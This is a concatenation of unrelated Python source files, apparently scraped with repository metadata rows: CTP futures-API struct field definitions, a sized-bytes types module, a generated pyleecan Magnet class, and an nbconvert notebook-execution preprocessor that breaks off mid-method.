"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcReqQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"LongCustomerName": "string",
}
CThostFtdcRspQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"BankUseAmount": "double",
"BankFetchAmount": "double",
"LongCustomerName": "string",
}
CThostFtdcFutureSignIOField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspFutureSignInField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"PinKey": "string",
"MacKey": "string",
}
CThostFtdcReqFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcReqQueryTradeResultBySerialField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"Reference": "int",
"RefrenceIssureType": "char",
"RefrenceIssure": "string",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"Digest": "string",
"LongCustomerName": "string",
}
CThostFtdcRspQueryTradeResultBySerialField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"Reference": "int",
"RefrenceIssureType": "char",
"RefrenceIssure": "string",
"OriginReturnCode": "string",
"OriginDescrInfoForReturnCode": "string",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"Digest": "string",
}
CThostFtdcReqDayEndFileReadyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"FileBusinessCode": "char",
"Digest": "string",
}
CThostFtdcReturnResultField = {
"ReturnCode": "string",
"DescrInfoForReturnCode": "string",
}
CThostFtdcVerifyFuturePasswordField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"AccountID": "string",
"Password": "string",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"TID": "int",
"CurrencyID": "string",
}
CThostFtdcVerifyCustInfoField = {
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"LongCustomerName": "string",
}
CThostFtdcVerifyFuturePasswordAndCustInfoField = {
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"LongCustomerName": "string",
}
CThostFtdcDepositResultInformField = {
"DepositSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"Deposit": "double",
"RequestID": "int",
"ReturnCode": "string",
"DescrInfoForReturnCode": "string",
}
CThostFtdcReqSyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspSyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcNotifyQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"BankUseAmount": "double",
"BankFetchAmount": "double",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcTransferSerialField = {
"PlateSerial": "int",
"TradeDate": "string",
"TradingDay": "string",
"TradeTime": "string",
"TradeCode": "string",
"SessionID": "int",
"BankID": "string",
"BankBranchID": "string",
"BankAccType": "char",
"BankAccount": "string",
"BankSerial": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"FutureAccType": "char",
"AccountID": "string",
"InvestorID": "string",
"FutureSerial": "int",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"CustFee": "double",
"BrokerFee": "double",
"AvailabilityFlag": "char",
"OperatorCode": "string",
"BankNewAccount": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryTransferSerialField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"CurrencyID": "string",
}
CThostFtdcNotifyFutureSignInField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"PinKey": "string",
"MacKey": "string",
}
CThostFtdcNotifyFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcNotifySyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryAccountregisterField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"BankBranchID": "string",
"CurrencyID": "string",
}
CThostFtdcAccountregisterField = {
"TradeDay": "string",
"BankID": "string",
"BankBranchID": "string",
"BankAccount": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"AccountID": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustomerName": "string",
"CurrencyID": "string",
"OpenOrDestroy": "char",
"RegDate": "string",
"OutDate": "string",
"TID": "int",
"CustType": "char",
"BankAccType": "char",
"LongCustomerName": "string",
}
CThostFtdcOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcCancelAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcChangeAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"NewBankAccount": "string",
"NewBankPassWord": "string",
"AccountID": "string",
"Password": "string",
"BankAccType": "char",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"BrokerIDByBank": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"TID": "int",
"Digest": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcSecAgentACIDMapField = {
"BrokerID": "string",
"UserID": "string",
"AccountID": "string",
"CurrencyID": "string",
"BrokerSecAgentID": "string",
}
CThostFtdcQrySecAgentACIDMapField = {
"BrokerID": "string",
"UserID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcUserRightsAssignField = {
"BrokerID": "string",
"UserID": "string",
"DRIdentityID": "int",
}
CThostFtdcBrokerUserRightAssignField = {
"BrokerID": "string",
"DRIdentityID": "int",
"Tradeable": "int",
}
CThostFtdcDRTransferField = {
"OrigDRIdentityID": "int",
"DestDRIdentityID": "int",
"OrigBrokerID": "string",
"DestBrokerID": "string",
}
CThostFtdcFensUserInfoField = {
"BrokerID": "string",
"UserID": "string",
"LoginMode": "char",
}
CThostFtdcCurrTransferIdentityField = {
"IdentityID": "int",
}
CThostFtdcLoginForbiddenUserField = {
"BrokerID": "string",
"UserID": "string",
"IPAddress": "string",
}
CThostFtdcQryLoginForbiddenUserField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcMulticastGroupInfoField = {
"GroupIP": "string",
"GroupPort": "int",
"SourceIP": "string",
}
CThostFtdcTradingAccountReserveField = {
"BrokerID": "string",
"AccountID": "string",
"Reserve": "double",
"CurrencyID": "string",
}
CThostFtdcQryLoginForbiddenIPField = {
"IPAddress": "string",
}
CThostFtdcQryIPListField = {
"IPAddress": "string",
}
CThostFtdcQryUserRightsAssignField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcReserveOpenAccountConfirmField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"BrokerIDByBank": "string",
"TID": "int",
"AccountID": "string",
"Password": "string",
"BankReserveOpenSeq": "string",
"BookDate": "string",
"BookPsw": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcReserveOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"BrokerIDByBank": "string",
"TID": "int",
"ReserveOpenAccStas": "char",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcAccountPropertyField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"BankAccount": "string",
"OpenName": "string",
"OpenBank": "string",
"IsActive": "int",
"AccountSourceType": "char",
"OpenDate": "string",
"CancelDate": "string",
"OperatorID": "string",
"OperateDate": "string",
"OperateTime": "string",
"CurrencyID": "string",
}
CThostFtdcQryCurrDRIdentityField = {
"DRIdentityID": "int",
}
CThostFtdcCurrDRIdentityField = {
"DRIdentityID": "int",
}
CThostFtdcQrySecAgentCheckModeField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcQrySecAgentTradeInfoField = {
"BrokerID": "string",
"BrokerSecAgentID": "string",
}
CThostFtdcUserSystemInfoField = {
"BrokerID": "string",
"UserID": "string",
"ClientSystemInfoLen": "int",
"ClientSystemInfo": "string",
"ClientPublicIP": "string",
"ClientIPPort": "int",
"ClientLoginTime": "string",
"ClientAppID": "string",
}
CThostFtdcReqUserAuthMethodField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspUserAuthMethodField = {
"UsableAuthMethod": "int",
}
CThostFtdcReqGenUserCaptchaField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspGenUserCaptchaField = {
"BrokerID": "string",
"UserID": "string",
"CaptchaInfoLen": "int",
"CaptchaInfo": "string",
}
CThostFtdcReqGenUserTextField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspGenUserTextField = {
"UserTextSeq": "int",
}
CThostFtdcReqUserLoginWithCaptchaField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"Captcha": "string",
"ClientIPPort": "int",
}
CThostFtdcReqUserLoginWithTextField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"Text": "string",
"ClientIPPort": "int",
}
CThostFtdcReqUserLoginWithOTPField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"OTPPassword": "string",
"ClientIPPort": "int",
}
CThostFtdcReqApiHandshakeField = {
"CryptoKeyVersion": "string",
}
CThostFtdcRspApiHandshakeField = {
"FrontHandshakeDataLen": "int",
"FrontHandshakeData": "string",
"IsApiAuthEnabled": "int",
}
CThostFtdcReqVerifyApiKeyField = {
"ApiHandshakeDataLen": "int",
"ApiHandshakeData": "string",
}
CThostFtdcDepartmentUserField = {
"BrokerID": "string",
"UserID": "string",
"InvestorRange": "char",
"InvestorID": "string",
}
CThostFtdcQueryFreqField = {
"QueryFreq": "int",
}
| 24.87309 | 51 | 0.598508 | [
"MIT"
] | 1122455801/vnpy | vnpy/api/ctp/generator/ctp_struct.py | 122,102 | Python |
from tranzact.util.byte_types import make_sized_bytes
bytes4 = make_sized_bytes(4)
bytes8 = make_sized_bytes(8)
bytes32 = make_sized_bytes(32)
bytes48 = make_sized_bytes(48)
bytes96 = make_sized_bytes(96)
bytes100 = make_sized_bytes(100)
bytes480 = make_sized_bytes(480)
| 27.2 | 53 | 0.819853 | [
"Apache-2.0"
] | Tranzact-Network/tranzact-blockchain | tranzact/types/blockchain_format/sized_bytes.py | 272 | Python |
# -*- coding: utf-8 -*-
# File generated according to Generator/ClassesRef/Machine/Magnet.csv
# WARNING! All changes made in this file will be lost!
"""Method code available at https://github.com/Eomys/pyleecan/tree/master/pyleecan/Methods/Machine/Magnet
"""
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from ._frozen import FrozenClass
from ._check import InitUnKnowClassError
from .Material import Material
class Magnet(FrozenClass):
"""Magnet class"""
VERSION = 1
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
mat_type=-1,
type_magnetization=0,
Lmag=0.95,
init_dict=None,
init_str=None,
):
"""Constructor of the class. Can be use in three ways :
- __init__ (arg1 = 1, arg3 = 5) every parameters have name and default values
for pyleecan type, -1 will call the default constructor
- __init__ (init_dict = d) d must be a dictionary with property names as keys
- __init__ (init_str = s) s must be a string
s is the file path to load
ndarray or list can be given for Vector and Matrix
object or dict can be given for pyleecan Object"""
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "mat_type" in list(init_dict.keys()):
mat_type = init_dict["mat_type"]
if "type_magnetization" in list(init_dict.keys()):
type_magnetization = init_dict["type_magnetization"]
if "Lmag" in list(init_dict.keys()):
Lmag = init_dict["Lmag"]
# Set the properties (value check and convertion are done in setter)
self.parent = None
self.mat_type = mat_type
self.type_magnetization = type_magnetization
self.Lmag = Lmag
# The class is frozen, for now it's impossible to add new properties
self._freeze()
def __str__(self):
"""Convert this object in a readeable string (for print)"""
Magnet_str = ""
if self.parent is None:
Magnet_str += "parent = None " + linesep
else:
Magnet_str += "parent = " + str(type(self.parent)) + " object" + linesep
if self.mat_type is not None:
tmp = self.mat_type.__str__().replace(linesep, linesep + "\t").rstrip("\t")
Magnet_str += "mat_type = " + tmp
else:
Magnet_str += "mat_type = None" + linesep + linesep
Magnet_str += "type_magnetization = " + str(self.type_magnetization) + linesep
Magnet_str += "Lmag = " + str(self.Lmag) + linesep
return Magnet_str
def __eq__(self, other):
"""Compare two objects (skip parent)"""
if type(other) != type(self):
return False
if other.mat_type != self.mat_type:
return False
if other.type_magnetization != self.type_magnetization:
return False
if other.Lmag != self.Lmag:
return False
return True
def compare(self, other, name="self", ignore_list=None):
"""Compare two objects and return list of differences"""
if ignore_list is None:
ignore_list = list()
if type(other) != type(self):
return ["type(" + name + ")"]
diff_list = list()
if (other.mat_type is None and self.mat_type is not None) or (
other.mat_type is not None and self.mat_type is None
):
diff_list.append(name + ".mat_type None mismatch")
elif self.mat_type is not None:
diff_list.extend(
self.mat_type.compare(other.mat_type, name=name + ".mat_type")
)
if other._type_magnetization != self._type_magnetization:
diff_list.append(name + ".type_magnetization")
if other._Lmag != self._Lmag:
diff_list.append(name + ".Lmag")
# Filter ignore differences
diff_list = list(filter(lambda x: x not in ignore_list, diff_list))
return diff_list
def __sizeof__(self):
"""Return the size in memory of the object (including all subobject)"""
S = 0 # Full size of the object
S += getsizeof(self.mat_type)
S += getsizeof(self.type_magnetization)
S += getsizeof(self.Lmag)
return S
def as_dict(self, **kwargs):
"""
Convert this object in a json serializable dict (can be use in __init__).
Optional keyword input parameter is for internal use only
and may prevent json serializability.
"""
Magnet_dict = dict()
if self.mat_type is None:
Magnet_dict["mat_type"] = None
else:
Magnet_dict["mat_type"] = self.mat_type.as_dict(**kwargs)
Magnet_dict["type_magnetization"] = self.type_magnetization
Magnet_dict["Lmag"] = self.Lmag
# The class name is added to the dict for deserialisation purpose
Magnet_dict["__class__"] = "Magnet"
return Magnet_dict
def _set_None(self):
"""Set all the properties to None (except pyleecan object)"""
if self.mat_type is not None:
self.mat_type._set_None()
self.type_magnetization = None
self.Lmag = None
def _get_mat_type(self):
"""getter of mat_type"""
return self._mat_type
def _set_mat_type(self, value):
"""setter of mat_type"""
if isinstance(value, str): # Load from file
value = load_init_dict(value)[1]
if isinstance(value, dict) and "__class__" in value:
class_obj = import_class(
"pyleecan.Classes", value.get("__class__"), "mat_type"
)
value = class_obj(init_dict=value)
elif type(value) is int and value == -1: # Default constructor
value = Material()
check_var("mat_type", value, "Material")
self._mat_type = value
if self._mat_type is not None:
self._mat_type.parent = self
mat_type = property(
fget=_get_mat_type,
fset=_set_mat_type,
doc=u"""The Magnet material
:Type: Material
""",
)
def _get_type_magnetization(self):
"""getter of type_magnetization"""
return self._type_magnetization
def _set_type_magnetization(self, value):
"""setter of type_magnetization"""
check_var("type_magnetization", value, "int", Vmin=0, Vmax=3)
self._type_magnetization = value
type_magnetization = property(
fget=_get_type_magnetization,
fset=_set_type_magnetization,
doc=u"""Permanent magnet magnetization type: 0 for radial, 1 for parallel, 2 for Hallbach, 3 Tangential
:Type: int
:min: 0
:max: 3
""",
)
def _get_Lmag(self):
"""getter of Lmag"""
return self._Lmag
def _set_Lmag(self, value):
"""setter of Lmag"""
check_var("Lmag", value, "float", Vmin=0)
self._Lmag = value
Lmag = property(
fget=_get_Lmag,
fset=_set_Lmag,
doc=u"""Magnet axial length
:Type: float
:min: 0
""",
)
| 34.087719 | 111 | 0.610782 | [
"Apache-2.0"
] | mjfwest/pyleecan | pyleecan/Classes/Magnet.py | 7,772 | Python |
"""Module containing a preprocessor that removes the outputs from code cells"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
from textwrap import dedent
try:
from queue import Empty # Py 3
except ImportError:
from Queue import Empty # Py 2
from traitlets import List, Unicode, Bool
from nbformat.v4 import output_from_msg
from .base import Preprocessor
from ..utils.exceptions import ConversionException
from traitlets import Integer
class CellExecutionError(ConversionException):
"""
Custom exception to propagate exceptions that are raised during
notebook execution to the caller. This is mostly useful when
using nbconvert as a library, since it allows to deal with
failures gracefully.
"""
def __init__(self, traceback):
self.traceback = traceback
class ExecutePreprocessor(Preprocessor):
"""
Executes all the cells in a notebook
"""
timeout = Integer(30, config=True,
help="The time to wait (in seconds) for output from executions."
)
interrupt_on_timeout = Bool(
False, config=True,
help=dedent(
"""
If execution of a cell times out, interrupt the kernel and
continue executing other cells rather than throwing an error and
stopping.
"""
)
)
allow_errors = Bool(
False, config=True,
help=dedent(
"""
If `True`, a `CellExecutionError` is raised if any of the notebook
cells raises an exception during execution. Otherwise, execution
is continued and the output from the exception is included in the
cell output.
"""
)
)
extra_arguments = List(Unicode())
def preprocess(self, nb, resources):
path = resources.get('metadata', {}).get('path', '')
if path == '':
path = None
from jupyter_client.manager import start_new_kernel
kernel_name = nb.metadata.get('kernelspec', {}).get('name', 'python')
self.log.info("Executing notebook with kernel: %s" % kernel_name)
self.km, self.kc = start_new_kernel(
kernel_name=kernel_name,
extra_arguments=self.extra_arguments,
stderr=open(os.devnull, 'w'),
cwd=path)
self.kc.allow_stdin = False
try:
nb, resources = super(ExecutePreprocessor, self).preprocess(nb, resources)
finally:
self.kc.stop_channels()
self.km.shutdown_kernel(now=True)
return nb, resources
def preprocess_cell(self, cell, resources, cell_index):
"""
Apply a transformation on each code cell. See base.py for details.
"""
if cell.cell_type != 'code':
return cell, resources
outputs = self.run_cell(cell)
cell.outputs = outputs
if not self.allow_errors:
for out in outputs:
if out.output_type == 'error':
pattern = """\
An error occurred while executing the following cell:
------------------
{cell.source}
------------------
{out.ename}: {out.evalue}
"""
msg = dedent(pattern).format(out=out, cell=cell)
raise CellExecutionError(msg)
return cell, resources
def run_cell(self, cell):
msg_id = self.kc.execute(cell.source)
